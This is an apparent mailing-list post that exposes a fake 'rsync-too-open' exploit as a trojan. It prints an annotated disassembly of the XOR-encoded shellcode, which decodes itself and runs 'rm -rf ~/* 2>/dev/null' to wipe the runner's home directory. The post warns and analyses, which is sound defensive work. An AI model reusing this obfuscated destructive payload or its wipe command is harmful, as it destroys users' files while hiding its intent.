Message-ID: <40B7D37A.8050508@thievco.com>
From: BlueBoar at thievco.com (Blue Boar)
Subject: new rsync :) exploit rsync-too-open
dkey wrote:
> "nice mail"...but if somebody wants to use it, check the shellcode first...I
> think it deletes all your files in your home dir. I'm not sure, maybe
> somebody else can check it...
Yes.
seg000:00000000 ; Segment type: Pure code
; IDA listing (Intel syntax, 32-bit Linux/i386) of the shellcode carried by the posted
; "rsync-too-open" exploit, shown here already decoded. Offsets are relative to the
; start of the blob (seg000:0). What it does: a 75-byte XOR-decoder stub reveals a
; body that calls execve("/bin/sh", {"sh", "-c", "rm -rf ~/* 2>/dev/null", NULL}, NULL)
; and then sys_exit - i.e. it deletes the contents of the home directory of whoever
; runs the "exploit". The XOR key slides (0xFF, 0xFE, ...) one step per byte, so the
; strings are not visible in the encoded blob; decoding or disassembling it, as done
; here, is what exposes the intent.
seg000:00000000 seg000 segment byte public 'CODE' use32
seg000:00000000 assume cs:seg000
seg000:00000000 assume es:nothing, ss:nothing,
ds:nothing, fs:nothing, gs:nothing
seg000:00000000 jmp short loc_12 ; jmp/call/pop: obtain the runtime address of the encoded body
seg000:00000002
seg000:00000002 ; =============== S U B R O U T I N E ===============
seg000:00000002
seg000:00000002
seg000:00000002 sub_2 proc near ; CODE XREF: sub_2+10.p
seg000:00000002 pop esi ; ESI = return address pushed by "call sub_2" = 0x17 ("decoded"), start of the encoded section
seg000:00000003 xor ecx, ecx ; ECX = 0
seg000:00000005 mov cl, 75 ; decode 75 (0x4B) bytes: 0x17..0x61, i.e. from "decoded" through the final int 80h
seg000:00000007 mov al, 255 ; XOR key starts at 0xFF and is decremented per byte (sliding key, not a fixed one)
seg000:00000009
seg000:00000009 decode_loop: ; CODE XREF: sub_2+C.j
seg000:00000009 xor [esi], al ; decode the current byte in place with AL
seg000:0000000B dec al ; AL = AL - 1 (key for the next byte)
seg000:0000000D inc esi ; next byte
seg000:0000000E loop decode_loop ; ECX--; repeat while ECX != 0
seg000:00000010 jmp short decoded ; jump into the now-plaintext body
seg000:00000012 ;
---------------------------------------------------------------------------
seg000:00000012
seg000:00000012 loc_12: ; CODE XREF: seg000:00000000.j
seg000:00000012 call sub_2 ; pushes 0x17 (addr of the encoded section) as the return address
seg000:00000017
seg000:00000017 decoded: ; CODE XREF: sub_2+E.j ; first byte covered by the decode loop
seg000:00000017 call loc_41 ; pushes 0x1C = addr of "/bin/sh"; the strings below are skipped over, never executed
seg000:00000017 ;
---------------------------------------------------------------------------
seg000:0000001C aBinSh db '/bin/sh',0 ; execve pathname; EBP later points here and the argv strings are addressed relative to it
seg000:00000024 aSh db 'sh',0 ; argv[0] (EBP+8)
seg000:00000027 aC db '-c',0 ; argv[1] (EBP+0Bh)
seg000:0000002A aRmRf2DevNull db 'rm -rf ~/* 2>/dev/null',0 ; argv[2] (EBP+0Eh): wipes the invoking user's home directory, errors suppressed
seg000:00000041 ;
---------------------------------------------------------------------------
seg000:00000041
seg000:00000041 loc_41: ; CODE XREF: sub_2+15.p
seg000:00000041 pop ebp ; EBP = addr of "/bin/sh" (0x1C)
seg000:00000042 xor eax, eax ; EAX = 0
seg000:00000042 sub_2 endp
seg000:00000042
seg000:00000044 push eax ; argv[3] = NULL terminator (argv is built on the stack in reverse order)
seg000:00000045 lea ebx, [ebp+0Eh]
seg000:00000048 push ebx ; argv[2] = "rm -rf ~/* 2>/dev/null"
seg000:00000049 lea ebx, [ebp+0Bh]
seg000:0000004C push ebx ; argv[1] = "-c"
seg000:0000004D lea ebx, [ebp+8]
seg000:00000050 push ebx ; argv[0] = "sh"
seg000:00000051 mov ebx, ebp ; arg1: filename = "/bin/sh"
seg000:00000053 mov ecx, esp ; arg2: argv = ESP (the four pointers just pushed)
seg000:00000055 xor edx, edx ; arg3: envp = NULL
seg000:00000057 mov al, 0Bh ; EAX = 11 = __NR_execve (i386)
seg000:00000059 int 80h ; LINUX - sys_execve("/bin/sh", {"sh","-c","rm -rf ~/* 2>/dev/null",NULL}, NULL)
seg000:0000005B mov ebx, eax ; only reached if execve failed: its return value (-errno) becomes the exit status
seg000:0000005D xor eax, eax
seg000:0000005F inc eax ; EAX = 1 = __NR_exit (the 1 is the syscall number; the status is in EBX)
seg000:00000060 int 80h ; LINUX - sys_exit
seg000:00000060 seg000 ends
seg000:00000060 end
AKA "/bin/sh -c rm -rf ~/* 2>/dev/null"
BB